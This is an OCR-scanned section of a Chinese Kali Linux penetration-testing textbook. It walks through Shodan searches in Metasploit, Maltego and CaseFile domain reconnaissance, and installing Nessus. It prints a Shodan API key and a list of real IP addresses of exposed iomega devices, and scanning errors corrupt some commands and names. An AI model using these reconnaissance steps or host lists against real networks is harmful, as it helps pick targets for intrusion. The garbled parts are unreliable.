(2) 从 http://www.shodanhg.com/api_ doc 网 站 获取 API key， 获 取 界 面 如 图 4.8 所 示 。 


uni * 


获取 APTkey， 为 了 在 后 面 使 用 。 


jJ &SHODAN - Computer $ x ' 
€ SC [www.sh 


Shodan Exploits Scanhub Maps Blée AnhiversaoyiPromotid Bay) @ 


EL EE 


Home Search Directory Data Analytics! Exports Developer Center Labs 


Success: API key successfuliy qenerated. 


Analytics 


Your API key 


duV9vwoCmovoDiWafWafax8sj0ZUa5BU 


图 4.8 获取 的 API key 


(3) 局 动 PostgreSQL 服务 。 执 行 命令 如 下 所 示 : 


root@kali:~# service postgresql start 


(4) JAZ) Metasploit 服务 。 执 行 命令 如 下 所 示 : 
root@kali:~# service metasploit start 
(5) 启动 MSF 终端 ， 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 
msf > 


(6) 选择 auxiliary/gather/shodan search 模块 ， 并 查看 该 模块 下 可 配置 的 选项 参数 。 执 
行 命 令 如 下 所 示 : 
msf > use auxiliary/gather/shodan_search 


msf auxiliary(shodan_search) > show options 
Module options (auxiliary/gather/shodan_ search): 


Name Current Setting Required Description 

DATABASE false no Add search results to the database 

FILTER no Search for a specific IP/City/Country /Host name 
MAXPAGE 1 yes Max amount of pages to collect 

OUTFILE no A filename to store the list of IPs 

Proxies no Use a proxy chain 

QUERY yes Keywords you want to search for 

SHODAN APIKEY yes The SHODAN API key 

VHOST www.shodanhq.com yes The virtual host name to use in requests 


从 以 上 输出 信息 中 ， 可 以 看 到 有 四 个 必须 配置 选项 参数 。 其 中 有 两 个 选项 已 经 配置 ， 
QUERY 和 SHODAN APIKEY 还 没有 配置 。 
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(7) iE QUERY 和 SHODAN APIKEY 选项 参数 。 执 行 命令 如 下 所 示 : 


msf auxiliary(shodan search) > set SHODAN_APIKEY duV9vwgCmo0oDfWqfWafax8sj0ZUa5BU 
SHODAN APIKEY => duV9vwgCmo0oDfWqfWafax8sj0ZUa5BU 

msf auxiliary(shodan_search) > set QUERY iomega 

QUERY => iomega 


从 输出 的 信息 中 ， 可 以 看 到 QUERY 和 SHODAN APIKEY 选项 成 功 配 置 。 
(8) 启动 搜索 引擎 。 执 行 命令 如 下 所 示 : 


msf auxiliary(shodan search) > run 
[*] Total: 160943 on 3219 pages. Showing: 1 


[*] Country Statistics: 

[*] United Kingdom (GB): 27408 
[*] United States (US): 25648 
[*] France (FR): 18397 

[x] Germany (DE): 12918 

[*] Netherlands (NL): 6189 

[*] Collecting data, please wait... 


IP Results 
IP City Country Hostname 
104.33.212.215:80 N/A N/A cpe-104-33-212-215.socal.res.rr.com 
107.3.154.29:80 Cupertino United States c-107-3-154-29 .hsd1.ca.comcast.net 
108.0.152.164:443 Thousand Oaks United States pool-108-0-152-164 Isanca fios. verizon.net 
108.20.167.210:80 Maynard United States 
pool-108-20-167-210.bstnma .fios.verizon.net 
108.20.213.253:443 Franklin United States 
pool-108-20-213-253.bstnma .fios.verizon.net 
109.156.24.235:443 Sheffield United Kingdom 


host109-156-24-235.range109-156.btcentralplus.com 
129.130.72.209:443 Manhattan United States 


130.39.112.9:80 Baton Rouge United States Isf-museum.|su.edu 

146.52.252.157:80 Leipzig Germany  ip9234fc9d.dynamic.kabel-deutschland.de 

147.156.26.160:80 Valencia Spain gpoeibak.optica.uv.es 

94.224.87.80:8080 Peutie Belgium 94-224-87-80.access.telenet.be 

95.93.3.155:80 Faro Portugal a95-93-3-155.cpe.netcabo.pt 

96.232.103.131:80 Brooklyn United States 
pool-96-232-103-131.nycmny.fios.verizon.net 

96.233.79.133:80 Woburn United States 
pool-96-233-79-133.bstnma.fios.verizon.net 

96.240.130.179:443 Arlington United States 
pool-96-240-130-179.washdc.fios.verizon.net 

97.116.40.223:443 Minneapolis United States 97-116-40-223 mpls.qwest.net 

97.76.110.250:80 Clearwater United States rrcs-97-76-110-250.se.biz.rr.com 

98.225.213.167:443 Warminster United States 
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c-98-225-213-167.hsd1.pa.comcast.net 
[*] Auxiliary module execution completed 


以 上 输出 的 信息 显示 了 匹配 iomega 关键 字 的 所 有 信息 。 搜 索 的 结果 显示 了 四 列 ， 分 别 
表示 IP 地 址 、 城 市 、 国 家 和 主机 名 。 如 果 想 要 使 用 过 滤 关 键 字 或 得 到 更 多 的 啊 应 页 ， 用 户 
必须 要 购买 一 个 收费 的 APIkey。 


4.8 使 用 Maltego 收集 信息 


Maltego 是 一 个 开源 的 漏洞 评估 工具 ， 它 主要 用 于 论证 一 个 网 络 内 单 点 故障 的 复杂 性 
和 严重 性 。 该 工具 能 够 聚集 来 日 内 部 和 外 部 资源 的 信息 ， 并 且 提 供 一 个 清晰 的 漏洞 分 析 界 
面 。 本 节 将 使 用 Kali Linux 操作 系统 中 的 Maltego， 演 示 该 工具 如 何 帮 助 用 户 收 集 信息 。 


4.8.1 准备 工作 


在 使 用 Maltego 工具 之 前 ， 需 要 到 https://www.paterva.com/web6/community/maltego/ 
网 站 注册 一 个 账号 。 注 册 界 和 面 如 图 4.9 所 示 。 


SO er AS 


有 fm Google SHE [e] 百度 -- 您 的 访问 出 错 了 图 | 百度 一 下 ， 你 就 知道 E) aboutblank 把] 获取 更 多 附加 模块 v 


Register 


Register an account today for free! 


Firstname 
Lastname 
Organisation 
Email Address 
Password 


Password Confirmation 


图 4.9 注册 账号 


在 该 界面 填写 正确 信息 后 ， 单 击 Register 按钮 ， 将 完成 注册 。 此 时 ， 注 册 账 号 时 使 用 
的 邮箱 将 会 收 到 一 份 邮件 ， 登 录 邮 箱 ， 将 用 户 账 户 激 活 。 


4.8.2 使 用 Maltego 工具 


使 用 Maltego 工具 收集 信息 。 具 体操 作 步 又 如 下 所 示 : 
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CDJA Maltego 工具 。 依 次 选择 “应 用 程序 ”|Kali Linux|“ 信 息 收集 ”|“ 情 报 分 析 ” 
|maltego 命令 ， 将 显示 如 图 4.10 所 示 的 界面 。 


Welcome to Maltego! m 


Steps Startup wizard - Welcome (1 of 5) 

1. Welcome 

2. Login Welcome to Maltego! 

3. Loginresult 

4. Select transform seeds This wizard will guide you through the steps of setting up your Maltego Client 
5. Update transforms for first use. 


We hope that you enjoy using our product as much as we enjoy building it! 


Please note that the Community Edition is intended for non-commercial use 
only! 


= 
Oy 


图 4.10 Maltego 欢迎 界面 


(2) 在 该 界面 单 击 Next 按钮 ， 将 显示 如 图 4.11 所 示 的 界面 。 


Welcome to Maltego! m 
Steps Startup wizard - Login (2 of 5) 
1. Welcome Enter your details below to log in to the Maltego Community Server 
2. Login | 
3. Login result Or if you have not done so yet, register here 
4, Select transform seeds 
5. Uydate transforms Login 


* Emal Address | 
Password | 


SSP D yM 


Á 20 
' * Solve captc 
. Oy) | ptcha | 


图 4.11 登录 界面 
(3) 在 该 界面 输入 表面 注册 用 户 时 的 邮箱 地 址 和 密码 及 验证 人 码 。 然 后 单 击 Next 按钮 ， 
将 显示 如 图 4.12 所 示 的 界面 。 


(4) 该 界面 显示 了 登录 结果 信息 。 此 时 ， 单 击 Next 按钮 ， 将 显示 如 图 4.13 所 示 的 
Jt f. 
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Welcome to Maltegol 


Steps Startup wizard - Login result (3 of 5) 

1. Welcome 

2. Login Hello li, welcome to Maltego Community Edition! 
3. Login result 

4. Select transform seeds Personal details 

5. Update transforms 


Firstname li 
Surname yw 


Email address qENEENERRKG qq.com 


Your API key is valid until April 24, 2014 at 12:00:00 AM CST 


图 4.12 登录 成 功 


Welcome to Maltego! ka 
Steps Startup wizard - Select transform seeds (4 of 5) 
1. Welcome 
2. Login Discover transforms from: 
3. Login result 
4. Select transform seeds saai urne i stems 
5. Update transforms 


m Local TAS (Transform Application Server) 


Note: The transform seed settings can be changed later through Manage->Discover 
Transforms. 


图 4.13 JETER Ex 


C5) 在 该 界面 发 现 转换 节点 信息 的 来 源 。 然 后 单 击 Next 按钮 ， 将 显示 如 图 4.14 Aras 
的 界面 。 


(6) 在 该 界面 选择 怎样 使 用 Maltego， 这 里 选择 默认 的 选项 Run a machine(NEW1!)。 然 
后 单 击 Finish 按钮 ， 将 显示 如 图 4.15 所 示 的 界面 。 
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Steps 

1. Welcoma 

2. Login 

3. Loginresult 

4, Select transform seeds 
5. Update transforms 


D — 
O 


Steps 


1. Choose machine 
2. Specify target 


= 
O 


Welcome to Maltego! 
Startup wizard - Update transforms (5 of 5) 
Ready...Set...GO! 


Your new Maltego client has been initialized sucessfully! 


3 newapplication server(s) were found 


Ww 


123 newtrans'orms were ‘ound 


75 new entities wee installed 


You are now “eady to use Maltego! 
(& Run a machine (NEW!!) 
© Opena blank graph and let me play around 
© Openan example graph 


© Go away, I ave done this before! 


图 4.14 更 新 转换 节点 


Start a Machine 


Run Machine - Choose machine (1 of 2) 


Please select the machine to run from the list below: 


©) Company Stalker [Domain] 


his Machine will try tó get all email Addresses At A dómain then see wh 


^ Foot print L1 [Domain] 


This perform 


\ Footprint L2 


This performs a level 2 (mild) footprint of a domain 


©) Footprint L3 [Domain] 


This performs a level 3 (intense) footprint an a domain, It takes a while... 


Show on startup 
Show on empty graph click 


图 4.1$ 选择 主机 


CI) 该 界面 用 来 选择 运行 的 主机 ， 这 里 选择 Company Stalker HRW) 选项 。 然 后 单 
ii Next 投 钮 ， 将 显示 如 图 4.16 所 示 的 界面 。 
(8) 在 该 界面 输入 一 个 域名 。 然 后 单 击 Finish 按钮 ， 将 显示 如 图 4.17 所 示 的 界面 。 
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Start a Machine 


Steps Run Machine - Specify target (2 of 2) 


te m The Company Stalker machine requires the following inputs: 
2. Specify target 


Domain Name [patevacom | 


图 4.16 指定 目标 


Results Limited 


A Note -hat results within machines are res-ricted to ' 2 entities in the Community Edition 


C] Don't show again 


4] 4.17 Results Limited 


(9) 该 界面 提示 信息 在 paterva.com 主机 中 仅 限 于 12 个 实体 ,在 该 界面 选择 Don't show 
again， 然 后 单 击 OK 按钮 ， 将 显示 如 图 4.18 所 示 的 界面 。 


o» LA 
s he Investigate 
C anm ^" i 
le A 
Paste Clear Entity 
s All @ Delete Selection 
[E] Palette | < x 


9 Infrastructure 


An internet Auton 


DNS Name 
m 
Domain Name Sys 


&) Domain v 
An internet doma 


IPv4 Address paterva com 


An IP version 4 a 


<No Selection» 


= Property View 


Ba MX Record 
A DNS mall exchal ES Output- Transform Output 


«No Properties» 
5a NS Record 


A DNS name serv 
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(CI0y 访 界面 显示 了 刚 创建 的 paterva.com。 如 果 没 显示 ,在 右 侧 栏 Palette 下 选择 Domain, 
然后 用 鼠标 拖 搜 域名 到 Graph 中 。 在 该 界面 选择 paterva.com 域名 ， 将 会 在 右 侧 栏 显示 
paterva.com 域名 的 相关 信息 ， 如 图 4.19 所 示 。 访 域名 的 信息 可 以 修改 ， 如 修改 域名 。 单 击 
Property View 框 中 的 Domain Name, 将 女 标 选中 当前 的 域名 就 可 以 修改 。 例 如 ， 将 这 里 的 
域名 paterva.com 修改 为 targethost.com， 将 显示 如 图 4.20 所 示 的 界面 。 

> startPage»| SG New Graph (1) x mm 889p |n 
| Bubble View | Entity List | e LI E EJI PIE ee 
= N 


altego.Domair 


seii com 


= Property View 


|» x 


Domain 


MEL 
> maltego.Domain 


ta E 


targethost.com 


|» x 


Domain Name targethost.com 
WHOIS Info 

© Graph info 

Weight 


图 4.20 targethost.com 信息 


(11) 一 旦 目标 主机 设置 成 功 后 ， 用 户 就 可 以 启动 收集 信息 。 首 先 右 击 创建 的 域 实体 ， 
并 选择 Run Transform 将 显示 有 效 的 选项 ， 如 图 4.21 Ara. 

(12) 在 该 界面 可 以 选择 寻找 DNS 名 ， 执行 WHOIS 和 获取 电子 邮件 地 址 等 等 。 或 者 
选择 运行 所 有 转换 ， 显 示 结 果 如 图 4.22 rn. 

(13) 从 该 界面 可 以 看 到 获取 了 很 多 关于 targethost.com 的 信息 。 用 户 也 可 以 使 用 同样 
的 方法 ， 单 击 子 市 点 获取 想 要 查看 的 信息 。 

用 户 可 以 使 用 Maltego 映射 网 络 。Maltego 是 由 Paterva 创建 的 一 个 开源 工具 ， 用 于 信 
恩 收 集 和 取证 。 前 和 面 分 别 介 绍 了 Maltego AY In], 38d sov lE erp JE EHI UE 
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体 。 现 在 将 学 习 允 许 Maltego 去 绘制 日 己 的 图 表 ， 并 检查 各 种 来 源 完成 工作 。 因 为 用 户 可 
以 利用 这 一 点 目 动 化 快速 地 在 目标 网 络 内 收集 信息 ， 如 电子 邮件 地 址 、 服 务 器 和 执行 
WHOIS 查询 等 。 


sor Page = [EG New Graph (1) s] Ó New Graph 2) » 


All Transforms 
@ Run Machine DNS from Domain 
Copy to New Graph Domain owner detail 
i Change Type Email addresses from Domain 
Merge Files and Documents from Domain 
Clear/Refresh Images >| Other transforms 


Type Actions > 


Copy 
Copy (as List) 


图 4.21 启动 收集 信息 


à Start Page = |G New Graph (1) x | New Graph (2) > unc 
| MainView | Bubble View | Entity List | a | ^ | ah) 名 | 党 


ATA 
v 


w 


targethost.com 


4 ro&G»rwoimr ols 


1 


aden @targetbr net mailtargethost.com www targethost com ftp targethost com 


abuse contactipublicdomainrega try comcontactáPprivacyprotect org 


[E Output - Transform Output 


Running transform DomainToSOAInformation on 1 entities | 
Transform DomainToSOAInformation returned with 2 entities. 
Transform DomainToSOAInformation done 

Running transform To Website DNS [using Search Engine] on 1 entities 
Transform To Website [Quick lookup] returned with 1 entities. 


图 4.22 信息 收集 


用 户 可 以 通过 Transform Manager 窗口 中 All Transforms 标签 ， 启 动 和 禁用 转换 节点 ， 
如 图 4.23 所 示 。 
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^ Transform Manager 
( All Transforms 


|. & New Local Transform... 


Transform - Status Location | 


Default set 


m e 

CTITTTT TCI ETERRITTETRN 
WII NEN D UTD soca [sone | 

GD onantownsvaneschena [ey [eee 


a CI 
本 anangmnema fas poo p 


GA) PA Cliche deen: neGarbriande 


7 


| 


Click on the link above ‘or help 了 
about tus transtorm ‘| AllasToFacebookProfile as 


: Returns a Facebook affiliation for an alias (phrase) 


|. 口 popup _ Property 1D| 


图 4.23 Transform Manager 界面 


在 该 界面 列 出 了 所 有 转换 节点 。 为 了 能 够 使 用 几 个 转换 节点 ， 必 须 先 接受 disclaimer. 
接受 disclaimer 的 方法 ， 在 该 界面 选择 转换 节点 后 ， 单 击 最 底部 的 View disclaimer 按钮 ， 


将 显示 如 图 4.24 所 示 的 界面 。 


Transform Disclaimer 


FlickrAccountGetFriends 


Please note this transform is being run on the Paterva Transform 
Distribution Server and has been written by the user ‘Andrew 
MacPherson’. This transform will be run on 
http://alpine.paterva.com/cgi-bin/flickrGetFriends.py and Paterva 
cannot be held responsible for any damage caused by this 
transform, you run this AT YOUR OWN RISK. For more 
information on this transform feel free to contact 

andrew paterva.com Additional: PoC Only! Please do not use 
outside of this workshop. 


区 I accept the above disclaime 


lk 424 Transform Disclaimer 


在 该 界面 将 Iacceptthe above disclaimer HEA E, Wat Close TZ Lu] EA D. 
49 绘制 网 络 结构 图 


CaseFile 工具 用 来 绘制 网 络 结构 图 。 使 用 该 工具 能 快速 添加 和 连接 ， 并 能 以 图 形 界 和 面 


形式 灵活 的 构建 网 络 结构 图 。 本 市 将 介绍 Maltego CaseFile 的 使 用 。 
在 使 用 CaseFile 工具 之 前 ， 需 要 修改 系统 使 用 的 Java 和 Javac 版 本 。 因 为 CaseFile 工 
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HEJH Java 开发 的 ， 而 且 该 工具 必须 运行 在 Javal.7.0 版 本 上 。 但 是 在 Kali Linux 中 ， 安 装 
J-JDK6 和 JDK7， 而 CaseFile 默认 使 用 的 是 JDK6。 此 时 运行 CaseFile 工具 后 ， 图 形 界面 
无 法 显示 菜单 栏 。 所 以 就 需要 改变 IDK 版 本 ， 改 变 IDK 版 本 的 方法 如 下 所 示 。 

使 用 update-alternatives 命令 修改 Java 命令 版 本 。 执 行 命令 如 下 所 示 : 


root@kali:~# update-alternatives --config java 


有 2 个 候选 项 可 用 于 替换 java (提供 /usr/bin/java)。 


选择 路 径 优先 级 状态 
*0 /usr/lib/jvm/java-6-openjdk-i386/jre/bin/java 1061 自动 模式 
1 lusr/lib/jvm/java-6-openjdk-i386/jre/bin/java 1061 手动 模式 
2 lusr/lib/jvm/java-7-openjdk-i386/jre/bin/java 1051 手动 模式 
要 维持 当前 值 [*] 请 按 回 车 键 ， 或 者 键入 选择 的 编号 : 2 # 输 入 JDK7 版 本 编号 


update-alternatives: using /usr/lib/jvm/java-/7-openjdk-i386/jre/bin/java to provide /usr/bin/java 

(java) in 手动 模式 

从 输出 的 信息 中 可 以 看 到 已 经 修改 为 JDK7 版 本 ， 而 且 是 手动 模式 。 或 者 使 用 java 命 
令 得 看 当前 的 版 本 信息 ， 执 行 命令 如 下 所 示 : 


root@kali:~# java -version 

java version "1.7.0 25" 

OpenJDK Runtime Environment (IcedTea 2.3.10) (7u25-2.3.10-1~deb/u1) 
OpenJDK Server VM (build 23.7-b01, mixed mode) 


从 以 上 结果 中 可 以 确定 当前 系统 的 java 命令 版 本 是 1.7.0。 
使 用 update-alternatives 命令 修改 javac 命令 版 本 。 执 行 命令 如 下 所 示 : 


root@kali:~# update-alternatives --config javac 


有 2 个 候选 项 可 用 于 替换 javac (提供 /usr/bin/javac). 


选择 路 径 优先 级 状态 
* 0 /usr/lib/jvm/java-6-openjdk-i386/bin/javac 1061 自动 模式 
1 /usr/lib/jvm/java-6-openjdk-i386/bin/javac 1061 手动 模式 
/usr/lib/jvm/java-7-openjdk-i386/bin/javac 1051 手动 模式 
要 维持 当前 值 [*] 请 按 回 车 键 ， 或 者 键入 选择 的 编号 : 2 # 输 入 JDK7 版 本 编号 


update-alternatives: using /usr/lib/jvm/java-/-openjdk-i386/bin/javac to provide /usr/bin/javac 

(javac) in 手动 模式 

从 输出 的 信息 中 可 以 看 到 已 经 修改 为 JDK7 WA, 而 且 是 手动 模式 。 这 时 , 再 使 用 javac 
命令 查看 当前 的 版 本 信息 ， 执 行 命令 如 下 所 示 : 


root@kali:~# javac -version 
java version "1.7.0 25" 


从 以 上 结果 中 可 以 确定 当前 系统 的 javac 命令 版 本 是 1.7.0. 

【实例 4-7】 使 用 CaseFile 工具 绘制 一 个 网 络 结构 图 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 局 动 CaseFile。 依次 选择 “应 用 程序 ” [Kali Linux| “信息 收集 ”| 情报 分 析 ^ |casefile 
命令 ， 将 显示 如 图 4.25 所 示 的 界面 。 
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Welcome to Maltego! 
Steps Startup wizard - Welcome (1 of 2) 
l. Welcome 
2. Ready..Set..Go! Welcome to Maltego CaseFile! 


We hope that you enjoy using our product as much as we 
enjoy building it! 


图 4.25 ”欢迎 界面 


(2) 该 界面 是 一 个 欢迎 信息 ， 这 里 单 击 Next 按钮 ， 将 显示 如 图 4.26 所 示 的 界面 。 


Welcome to Maltego! 


Steps Startup wizard - Ready..Set..Go! (2 of 2) 


1, Welcome 
2. Ready..Set..Go! Ready...Set...GO! 


What do you want to do next? 


($ Open a blank graph and let me play around 
© Open an example graph 


© Go away, | have done this before! 


f ? = f 3 r . ' | £X 
< Back 


图 4.26 设置 向 导 


(3 ) 该 界面 选择 将 要 进行 什么 操作 。 这 里 选择 Open a blank graph and let me play around, 
然后 单 击 Finish 按钮 ， 将 显示 如 图 4.27 所 示 的 界面 。 

(4) 从 该 界面 可 以 看 到 没有 任何 信息 ， 因 为 默认 没有 选择 任何 设备 。 该 工具 和 Maltego 
工具 一 样 ， 需 要 从 组 件 Palette 中 拖 忠 每 个 实体 到 图 表 中 。 本 例 中 选择 拖 忠 域 实 体 ， 并 且 改 
变 域 属性 ， 如 图 4.28 所 示 。 

(5) 在 该 界面 可 以 为 域 添 加 一 个 注释 。 将 鼠标 指 到 域 实 体 上 ， 然 后 双击 注释 图 标 ， 将 
显示 如 图 4.29 所 示 的 界面 。 
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Maltego CaseFile Community 1.0.1 


Manage Organize 


Paste Clear | ity dp z pii 
i All © Delete Selection 2$ /./.8% Z 


9 Devic... | Bubble View | Entity List | 


a Deskto 


A perso 


: GC Detail... |» x 
Device 


A device 


«no selection» 
A portab 


a 
E Mobile 
= 


Mobile 
A device = Prope... | » x 


Amobile 


Maltego CaseFile Community 1.0.1 
Manage Organize 


Paste Clear ity dic à 
i Al GO Delete Selection 2$ eR Z 


© Devic... 
© Events 
Eaka QE Detail View | » x 
ntra... E 
Domain | 
Qv maltego.Domain | 
paterva.com|- 
paterva.com d 


Domain Name paterva.... 
WHOIS Info 


Maltego CaseFile Community 1.0.1 


Manage Organize 


Paste Clear | Pisce da eA * a 


© Devic... 
© Events 
©- Groups 


ÊS Detail View |>» x 
9 Infra... — UM 
This is our starting point 


Ds 


Domain 


vY maltego.Domain 


paterva.comi- 


a 


paterva.com | 


= Property View |» x 
Q Properties 
Type 


Domain Name paterva....[... 
WHOIS Info 


图 4.29 添加 注释 
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(CON 在 该 界面 可 以 看 到 添加 的 注释 信息 ， 该 信息 可 以 修改 。 将 鼠标 点 到 注释 信息 的 位 
和 置 即 可 修改 。 在 该 界面 还 可 以 拖 忠 其 他 实体 ， 这 里 拖 男 一 个 实体 域名 ， 用 来 记录 来 日 日 标 
主机 的 DNS 信息 ， 如 图 4.30 所 示 。 
; = Maltego CaseFile Community 1.0.1 


Investigate Manage Organize 


<n ex » || 


Paste Clear Quick Enti z 
5 All Ê Delete | Find | Selection $$ 4. ^. ?* Z 


Clipboard Find Selection 


mamaa © Overview Ee 
© Events Q 
€- Groups e 


9 Infrastru... Ef Detail View 
e ^5 —. Domain 


An internet b 
| à maltego.Domain 


Es DNS Name 


i 


9 Domain 
An Internet d paterva.com = Property View 


IPv4 Addres " p : 
= An IP version T E == 
Type 
Be possi T Domain Name paterva...,...| 
mail ex alpine.paterva.com = 
pine.p wf WHOIS into 


B NS Record € Graph info 


paterva.com|_ 


图 4.30 域名 实体 


CI) 在 该 界面 可 以 将 这 两 个 实体 连接 起 来 。 只 需要 拖 一 个 线 ， 从 一 个 实体 到 另 一 个 实 
体 即 可 ， 如 图 4.31 所 示 。 


“ES EJ E A Maltego CaseFile Community 1.0.1 
Investigate Manage Organize 
K ele — al pt AAA dC 
Paste Clear X Cut Quick Entity % LU X P rm 
S All G Delete | Find | Selection $$ 4. ^. 9t 
Clipboard Find Selection 

[m] Palette 

€- Devices 

€- Events | 


© Groups ae — 
Cirad td This is cur starting point 


e ^5 DNS Name 


An internet A ax. ? maltego.DNSName 
Qv Hm alpine.pater 


> Domain paterva.com 
- An internet d hr 


| d 


An IP 
B» MX Record Hu 


A DNS mail ex alpine paterva.com 


z. NS Record 


图 4.31 连接 两 个 实体 
(8) 连接 两 个 实体 后 ， 将 显示 如 图 4.32 所 示 的 界面 。 


Properties 


Label | | 


Show Label |use Global Setting [= 


Style [solid [= 


Thickness |2 ~ 


Description | | 


L Do not show this dialog again 


k 
图 4.32 线条 属性 界面 
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(9) 访 界面 用 来 设置 线条 的 属性 。 可 以 修改 线 的 粗细 、 格 式 和 颜色 等 。 
(10) 重复 以 上 第 (5) 、 (6) 、 TD 和 (8) 步骤 添加 更 多 信息 ， 来 绘制 网 络 图 。 下 
面 绘制 一 个 简单 的 组 织 网 络 结构 图 ， 如 图 4.33 所 示 。 


“jA Start Page «| 5S New Graph (1)* x 
| MainView | Bubble View | Entity List | & 


p 
Target Company E 


192.168.10.101 


paterva.com 74.207.243.85 ae 


192.168.10.106 


a = 


www.paterva.com 192.168.10.201 


图 4.33 组 织 网 络 


(11) 从 该 界面 可 以 看 到 一 个 组 织 网 络 结构 图 。 此 时 用 户 可 以 保存 该 图 ， 如 琳 需 要 的 时 
候 ， 以 后 可 以 打开 并 编辑 该 图 。 如 果 需 要 重新 打开 一 个 Graph 窗口 ， 可 以 单 击 左 上 角 的 网 
或 者 国 图 标 ， 如 图 4.34 所 示 。 


Maltego CaseFile Community 1.0.1 


Recent Documents 


E 

Save - 1| 
ii 

Save All 

kd Save As 


E Save to Server 


~ 


Og Detai.. |» x 


| <_ Import > <no selection> 
— Export > 
= Prope... |» x 
Lm Print > 


e More about CaseFile 上 


% Exit ~ Options — 
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图 4.34 ”新建 Graph 
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在 该 界面 单 击 New 按钮 ， 将 会 创建 一 个 新 的 Graph， 此 时 会 命名 为 New Graph(2)， 如 
图 4.35 所 示 。 


Maltego CaseFile Community 1.0.1 


Investigate Manage Organize 


v 


de er 


Paste Clear Quick Entity rs 
x All Ê Delete | Find | Selection $2 4, /^, 9t ^ = 


Clipboard Find Selection 


" IPv4 Addr 


An IP vers 


图 4.35 新 建 的 New Graph(2) 
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#5 漏洞 扫描 


漏洞 扫 朱 器 是 一 种 能 够 目 动 在 计算 机 、 信 息 系 统 、 网 络 及 应 用 软件 中 寻找 和 发 现 安全 
弱点 的 程序 。 它 通过 网 络 对 目标 系统 进行 探测 ， 癌 目标 系统 发 生 数 据 ， 并 将 反馈 数据 与 自 
带 的 漏洞 特征 库 进 行 匹配 ， 进 而 列举 目标 系统 上 存在 的 安全 漏洞 。 漏 洞 扫描 是 保证 系统 和 
网 络 安全 必 不 可 少 的 手段 ， 面 对 互联 网 入 侵 ， 如 果 用 户 能 够 根据 具体 的 应 用 环境 ， 尽 可 能 
早 的 通过 网 络 扫 摘 来 发 现 安 全 漏洞 ， 并 及 时 采取 适当 的 处 理 措 施 进 行 修补 ， 就 可 以 有 效 地 
阻止 入 侵 事 件 的 发 生 。 由 于 该 工作 相对 枯燥 ， 所 以 我 们 可 以 借助 一 些 便 捷 的 工具 来 实施 ， 
如 Nessus 和 OpenVAS。 本 章 将 详细 讲解 这 两 个 工具 的 使 用 。 


5.1 使 用 Nessus 


Nessus 写 称 是 世界 上 最 流行 的 漏洞 扫描 程序 ， 全 世界 有 超过 75000 个 组 织 在 使 用 它 。 
该 工具 提供 完整 的 电脑 漏洞 扫描 服务 ， 并 随时 更 新 其 漏洞 数据 库 。Nessus 不 同 于 传统 的 漏 
洞 扫描 软件 ，Nessus 可 同时 在 本 机 或 远 端 上 遥控 ， 进 行 系统 的 漏洞 分 析 扫 描 。Nessus 也 是 
渗透 测试 重要 工具 之 一 。 所 以 ， 本 章 将 介绍 安装 、 配 置 并 启动 Nessus. 


5.1.1 安装 和 配置 Nessus 


为 了 定位 在 目标 系统 上 的 漏洞 ，Nessus 依赖 feeds 的 格式 实现 漏洞 检查 。Nessus 官网 
提供 了 两 种 版 本 : ARENAS MERC 

O KER: 家 性 版 是 供 非 商 业 性 或 个 人 使 用 。 家 放 版 比较 适合 个 人 使 用 ， 可 以 用 于 

韭 专业 的 环境 。 

O 专业 版 : 专业 版 是 供 商 业 性 使 用 。 它 包括 文 持 或 附加 功能 ， 如 无 线 并 发 连接 等 。 

本 小 节 使 用 Nessus 的 家 性 版 来 介绍 它 的 安装 。 具 体操 作 步 又 如 下 所 示 。 

(1) Fa Nessus 软件 包 。Nessus 的 官方 下 载 地 址 是 http://www.tenable.com/products/ 
nessus/select-your-operating-system。 在 浏览 右 中 输入 该 地 址 ， 将 显示 如 图 5.1 所 示 的 界面 。 

(2) 在 该 界面 左 侧 的 Download Nessus 下 ， 单 击 Linux， 并 选择 下 载 Nessus-5.2.6- 
debian6 1386.deb 包 ， 如 图 5.2 所 示 。 

(3) 单 击 Nessus-5.2.6-debian6 i386.deb 包 后 ， 将 显示 如 图 5.3 所 示 的 界面 。 

(4) 在 该 界面 单 击 Agree 按钮 ， 将 开始 下 载 。 然 后 将 下 载 的 包 ， 保 存 到 目 己 想 要 保存 
的 位 置 。 
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y © Download Nessus | Ten x T 


€ > CQ [www.tenable.com/products/nessus/select-your-operatinc a $^? 
:U 应 用 G3 Google EE 图 百度 -您 的 访问 出 错 ,.， [m] 百度 一 下 ， 你 就 知道 [ewes 


Download Nessus 
Please Select Your Operating System 


Microsoft Windows What's New in Nessus 


Mac OS X Nessus, a versatile vulnerability, 
J configuration, and compliance assessment 
Linux - 
solution. provides customers with new 
FreeBSD features and enhancements to improve 
configuration and start-up, multiple scanner 


Solaris "« 
control, usability, malware detection, and 


Checksums & GPG Keys remediation workflow. 


If ae ea 99m IS m 


图 5.1 


Download Nessus 


Please Select Your Operating System Subscription Agreement 


TENABLE NETWORK SECURITY, INC. 
NESSUS® 
» Microsoft Windows SOFTWARE LICENSE AGREEMENT 


» MacOSX This is a legal agreement ('Agreement") between Tenable Network 
Security, Inc., a Delaware corporation having offices at 7021 
Columbia Gateway Drive, Suite 500, Columbia, MD 21046 ("Tenable"), 
and you, the party licensing Software (“You”). This Agreement 
covers Your permitted use of the Software. BY CLICKING BELOW . 
Debian 6.0 (32 bits): YOU INDICATE YOUR ACCEPTANCE OF THIS AGREEMENT AND 


Nessus-5.2.6 debian6_i386.deb MOLLACHVMOMULECOCE TiAT VOLLLIAME DCAD ALL OF TLAC TI-IAAAC La 


s _ These technology and/or software were licensed in accordance with the US 
Debian 6.0 (64 bits): Department of Commerce, Export Administration Regulations (EAR). Diversion 
Nessus-5 2 6-debian6 amd64 deb contrary to US law is prohibited. No physica! or computational! access by nationals of 

u tier 4 countries (Cuba. Iran, N. Korea, Sudan. or Syria) is permitted 


Red Hat ES 4/ CentOS 4: 


Nessus-5.2.6-es4.i386.rpm 


Red Hat ES 5 (32 bits) / CentOS 5 / Oracle Linux 5 (including 


图 5.2 Fa Linux 系统 的 Nessus 图 5.3 接收 许可 证 


(5) 下 载 完 Nessus 软件 包 ， 现 在 就 可 以 来 安装 该 工具 。 执 行 命令 如 下 所 示 : 


root@kali:~# dpkg -i Nessus-5.2.6-debian6_i386.deb 
Selecting previously unselected package nessus. 


(正在 读 取 数据 库 ... 系统 当前 共 安 装 有 276380 个 文件 和 目录 。) 
正在 解压 缩 nessus (从 Nessus-5.2.6-debian6_i386.deb) ... 


正在 设置 nessus (5.2.6) ... 
nessusd (Nessus) 5.2.6 [build N25116] for Linux 
Copyright (C) 1998 - 2014 Tenable Network Security, Inc 


Processing the Nessus plugins... 


